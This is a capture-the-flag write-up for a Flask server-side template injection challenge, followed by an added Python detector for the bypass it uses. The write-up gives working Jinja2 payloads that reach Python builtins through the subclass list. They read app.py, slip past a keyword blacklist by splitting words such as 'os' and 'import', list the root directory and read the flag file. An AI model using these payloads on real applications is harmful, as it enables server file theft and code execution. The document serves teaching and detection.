FlaskApp
Iterate over the subclasses to find a usable class and read a file (strip the newlines when sending this as the payload):
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__=='catch_warnings' %}
{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}
{% endif %}
{% endfor %}
Alternatively, a Python script can walk the subclass list index by index, which also works but takes a long time:
{{[].__class__.__base__.__subclasses__()[%s].__name__}}
The WAF recovered from app.py:
def waf(str):
    black_list = ['flag', 'os', 'system', 'popen', 'import', 'eval', 'chr', 'request', 'subprocess', 'commands', 'socket', 'hex', 'base64', '*', '?']
    for x in black_list:
        if x in str.lower():
            return 1
Listing a directory: the listdir() function enumerates a directory.
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__=='catch_warnings' %}
{{ c.__init__.__globals__['__builtins__']['__im'+'port__']('o'+'s').listdir('/')}}
{% endif %}
{% endfor %}
The directory listing obtained:
['bin', 'boot', 'dev', 'etc', 'home', 'lib', 'lib64', 'media', 'mnt', 'opt', 'proc', 'root', 'run', 'sbin', 'srv', 'sys', 'tmp', 'usr', 'var', 'this_is_the_flag.txt', '.dockerenv', 'app']
Read the file this_is_the_flag.txt:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt','r').read() }}{% endif %}{% endfor %}
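Why the blacklist above is bypassed by the `'o'+'s'` / `'__im'+'port__'` payloads, and what a detection-side check that catches the split keywords looks like, as an added example that is not part of the original writeup. It reproduces the challenge's waf() shown above, uses the writeup's own directory-listing payload as constructed sample input, and then folds adjacent string-literal concatenation before matching; the DUNDERS list, normalize() and detect_ssti() are assumptions of this example, not code from the challenge. The real fix for the application is never to render user input as template source (pass it as a template variable instead); a detector like this is a defensive aid, not a substitute.

```python
import re

# Blacklist from the challenge's waf() as shown in the writeup.
BLACK_LIST = ['flag', 'os', 'system', 'popen', 'import', 'eval', 'chr', 'request',
              'subprocess', 'commands', 'socket', 'hex', 'base64', '*', '?']

# Dunder names that appear in the writeup's payloads; this list is an assumption
# of this example, not part of the challenge's WAF.
DUNDERS = ['__class__', '__base__', '__subclasses__', '__init__',
           '__globals__', '__builtins__', '__import__']

# The writeup's directory-listing payload, copied here as constructed sample input.
PAYLOAD = ("{% for c in [].__class__.__base__.__subclasses__() %}"
           "{% if c.__name__=='catch_warnings' %}"
           "{{ c.__init__.__globals__['__builtins__']['__im'+'port__']('o'+'s').listdir('/')}}"
           "{% endif %}{% endfor %}")


def waf(s):
    """The challenge's check: 1 if any blacklisted substring occurs (case-insensitive), else 0."""
    for x in BLACK_LIST:
        if x in s.lower():
            return 1
    return 0


# Two adjacent quoted literals joined by '+', e.g. 'o'+'s' or "a" + 'b'.
_CONCAT = re.compile(r"""(['"])((?:(?!\1).)*)\1\s*\+\s*(['"])((?:(?!\3).)*)\3""")


def normalize(s):
    """Fold 'a'+'b'+'c' into 'abc' so split keywords reassemble before matching."""
    prev = None
    while prev != s:          # repeat until no further concatenation is left
        prev = s
        s = _CONCAT.sub(lambda m: "'" + m.group(2) + m.group(4) + "'", s)
    return s


def detect_ssti(s):
    """Return the indicators found after normalisation (an empty list means nothing matched)."""
    n = normalize(s).lower()
    hits = [x for x in BLACK_LIST if x in n]
    hits += [d for d in DUNDERS if d in n]
    if '{{' in s or '{%' in s:
        hits.append('template-delimiters')
    return hits


if __name__ == '__main__':
    print('original waf():', waf(PAYLOAD))      # 0: the concatenation bypass passes
    print('normalized    :', normalize(PAYLOAD))
    print('indicators    :', detect_ssti(PAYLOAD))
```

Two caveats worth keeping in mind: substring matching on short words such as `os` also blocks harmless input like "post", so the original blacklist produces false positives as well as false negatives; and folding literals only closes the one bypass the writeup uses, which is why template source must not be built from user input in the first place.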